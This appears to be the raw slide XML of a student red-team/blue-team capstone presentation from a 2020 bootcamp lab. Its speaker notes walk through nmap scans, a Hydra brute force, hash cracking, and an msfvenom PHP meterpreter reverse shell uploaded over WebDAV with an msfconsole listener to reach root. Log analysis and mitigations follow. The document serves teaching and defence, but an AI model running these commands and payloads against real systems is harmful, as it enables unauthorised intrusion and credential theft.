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CFC8BB-8128-4DA1-9BCE-0B1FF54D50DF}">
  <a:tblStyle styleId="{FCCFC8BB-8128-4DA1-9BCE-0B1FF54D50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**Note**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Gunzip `/usr/share/wordlists/rockyou.txt.gz` before running Hydra.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Brute force the password for the hidden directory using Hydra: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`</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get/company_folders/secret_folder/`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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Results: host: 192.168.1.105 login: ashton password: leopoldo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Login to secret folder: 192.168.1.105/company_folders/secret_folder/ using login: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leopoldo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Follow instructions for file: connect_to_corp_server to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> webdav server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In Kali, navigate to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network File Manager/Browse Network dav://192.168.1.105/webdav/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Break hashed password for Ryan’s account using the https://crackstation.net/ website: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Hash Type Result: d7dad0a5cd7c8376eeb50d69b3ccd352 md5 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux4u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Connect to WebDav. `192.168.1.105/webdav/` login: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ryan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> password: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux4u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**Notes**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# Instructions for PHP Reverse Shell Exploit using msfvenom and msfconsole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Create the payload (Attacker IP: 192.168.1.90- Kali Machine)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`msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 &gt;&gt; shell.php`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Copy payload to server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In Kali, navigate to Network File Manager/Browse Network: dav://192.168.1.105/webdav/ login: ryan password: linux4u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Then copy msfvenom payload `</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>` to `</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dav://192.168.1.105/webdav/`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Using Kali machine, navigate to terminal, and start the listener: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n" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># msfconsole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n" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># search PHP/meterpreter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n" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># use 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(payload/php/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># set LHOST 192.168.1.90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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># back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n" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># use exploit/multi/handler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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># set payload php/meterpreter/reverse_tcp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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># show options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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set LHOST 192.168.1.90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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set LPORT 4444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n" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># run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Execute Shell payload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In web browser view the payload: 192.168.1.105/webdav/shell.php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# Your listening msfconsole will now have a meterpreter command prompt ready to send commands and shell meterpreter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meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell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n" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>results: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag.txt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n" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat flag.txt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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b1ng0w@5h1sn@m0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</a:rPr>
              <a:t>**Note**</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- The screenshot on the left shows Port Scan Data broken down by Timestamp and Count.</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The screenshot on the left shows Port Scan Data broken down by Port# and Count.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Scan for open ports and Version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# </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap -sV 192.168.1.1-105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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Results: port 80 open on 192.168.1.105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SYN Scan with OS Detection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# </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap -sS -A 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Results: Apache httpd 2.4.29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ab2e84cf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ab2e84cf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**Note**                   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Extra Slide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**Note**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Firewall port blocking and scan delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are effective port scan mitigation techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An IDS like Kibana or Splunk allow for immediate alerting of port scan activity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**Note**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&lt;Directory /var/www/webdav/&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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Order allow,deny</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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Allow from 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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Allow from 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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Allow from 127</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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Deny from all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&lt;LimitExcept GET POST HEAD&gt;deny from all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&lt;/LimitExcept&gt;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</a:rPr>
              <a:t>&lt;/Directory&gt;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**Note**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screenshot shows how we would have found the ip address of the Capstone “Victim” system, if we didn’t already know it was 192.168.1.105.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This is part of the nmap scan we didn’t complete in the beginning of the exercise, lol!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Nmap -sV -T4 192.168.1.0/24 -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scans all ip addresses and shows ip addresses of all hosts on this subnet, Port#, Status: Open or Closed,, Service, OS versions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 scan shows Port 80: Open - HTTP and identifies that system as the webserver which has an ip address of 192.168.1.105, then we would open a browser and go to that ip address.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don’t know where to put this screenshot because it is way to large and takes up a slide of it’s own. It would be part of the Red Team slides though.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9ad475bbfa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9ad475bbfa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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66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4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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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89.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88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0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101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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Relationship Id="rId5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639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By: Group 6: Dane Andrews, George Lee, Ryan Miller, and Sapna Patel; October 2020 - Rice University</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020" name="Google Shape;1020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Failed Password Lockout &amp; Weak Password </a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629325" y="1510125"/>
            <a:ext cx="2618400" cy="30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Executing Hydra brute force attack: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utilizing this bash tool, we cracked a simple dictionary password for Ashton’s account.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`hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder/`</a:t>
            </a:r>
            <a:endParaRPr b="1"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(Please see Speaker Notes)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7" name="Google Shape;1127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8" name="Google Shape;112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9" name="Google Shape;112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1" name="Google Shape;113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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6379050" y="148062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4" name="Google Shape;113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5" name="Google Shape;113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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6407550" y="1345174"/>
            <a:ext cx="2371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Results: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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3306150" y="1480625"/>
            <a:ext cx="26184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Password for Ashton was found in ‘rockyou’ dictionary.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Gained access to the /secret_folder/connect_to_corp_server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Info for /webdav/ system was found.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Hash for Ryan’s password was found and cracked (using the Crack Station website) allowing access to webdav.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0" name="Google Shape;11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825" y="1714775"/>
            <a:ext cx="310635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225" y="2038550"/>
            <a:ext cx="3144950" cy="4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825" y="2560175"/>
            <a:ext cx="3144949" cy="1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3850" y="3894850"/>
            <a:ext cx="1330155" cy="11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0825" y="3528200"/>
            <a:ext cx="3144950" cy="2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0826" y="3894850"/>
            <a:ext cx="1469274" cy="113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Persistent Reverse Shell Backdoor </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631975" y="1480625"/>
            <a:ext cx="27561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 and upload msfvenom payload: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</a:rPr>
              <a:t>`msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 &gt;&gt; shell.php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Established remote listener.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Executed a backdoor, by using a reverse shell on Capstone Apache server.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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(Please see Speaker Notes)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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4" name="Google Shape;1154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5" name="Google Shape;1155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6" name="Google Shape;1156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8" name="Google Shape;1158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9" name="Google Shape;1159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Created a  remote backdoor shell to the Capstone Apache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Gained access to root directory on the Capstone 192.168.1.105 server.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2" name="Google Shape;1162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3" name="Google Shape;1163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4" name="Google Shape;1164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Google Shape;1165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Results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7" name="Google Shape;116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875" y="1852681"/>
            <a:ext cx="2756102" cy="47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251" y="2401625"/>
            <a:ext cx="2549150" cy="89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263" y="3370862"/>
            <a:ext cx="1691437" cy="125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2575" y="4299136"/>
            <a:ext cx="1691425" cy="6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1" name="Google Shape;1171;p64"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1170" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7094375" y="4030043"/>
            <a:ext cx="358200" cy="58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8" name="Google Shape;117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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797088" y="1380699"/>
            <a:ext cx="4062600" cy="3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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265788" y="1377725"/>
            <a:ext cx="4395600" cy="3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6" name="Google Shape;118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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620775" y="675975"/>
            <a:ext cx="82671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original port scan performed by 192.168.1.90 occurred on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>Sep. 25 @ 1:18 am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14,159</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> packets were sent from 192.168.1.90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Note that multiple ports requested at the same time are indicative of a port scan</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1188" name="Google Shape;11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75" y="8121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13" y="1544925"/>
            <a:ext cx="3882518" cy="320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0" name="Google Shape;119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763" y="1621125"/>
            <a:ext cx="3759651" cy="3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91" name="Google Shape;1191;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198329" y="1280779"/>
            <a:ext cx="2925900" cy="43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4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source Port: Timestamp &amp; Count</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng">
              <a:solidFill>
                <a:srgbClr val="4A86E8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="Google Shape;1192;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743717" y="1284336"/>
            <a:ext cx="2925900" cy="43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4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source Port: Port# &amp; Count</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng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8" name="Google Shape;119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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645425" y="693525"/>
            <a:ext cx="8160600" cy="830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1290" lvl="0" marL="3200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hidden directory request occurred at </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01:00 am on 09/25/2020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="3200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15,734</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> requests were made, during the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-161290" lvl="0" marL="3200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file“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>” was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>requested, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>contained</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> the instructions for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>connecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Google Shape;12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25" y="851075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950" y="2763450"/>
            <a:ext cx="5116125" cy="21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25" y="1846799"/>
            <a:ext cx="3687575" cy="1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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91625" y="3271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Connecting to webdav server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1204" name="Google Shape;1204;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3852550" y="2496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Results of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1"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brute force</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1"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attack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0" name="Google Shape;121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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595950" y="665100"/>
            <a:ext cx="6675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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>15,734 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>requests made during the Brute Force Attack.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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>15,732</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> requests before the attacker discovered the password.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password was discovered on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>September 25th, 2020 at 01:00</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1212" name="Google Shape;12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00" y="7589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25" y="2869860"/>
            <a:ext cx="4960905" cy="7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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="162925" y="2390810"/>
            <a:ext cx="49068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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requests made </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( OK status_code represents password success):</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5501125" y="1291500"/>
            <a:ext cx="33132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i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ackets specifically from Hydra:</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1216" name="Google Shape;121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425" y="1622700"/>
            <a:ext cx="3485600" cy="33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925" y="2214789"/>
            <a:ext cx="2070395" cy="71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5" y="1733950"/>
            <a:ext cx="4858344" cy="21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4" name="Google Shape;122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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911125" y="631950"/>
            <a:ext cx="7048500" cy="53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98 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>requests were made to the /webdav/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Shell.php was requested </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>times.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Passwd.dav was requested </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> times</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>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Backdoor payload shell.php was uploaded on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>September 25th, 2020 02:41:07.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1226" name="Google Shape;12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50" y="772650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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7597800" y="2148713"/>
            <a:ext cx="146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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /webdav/ directory requests</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52575" y="3725211"/>
            <a:ext cx="146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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
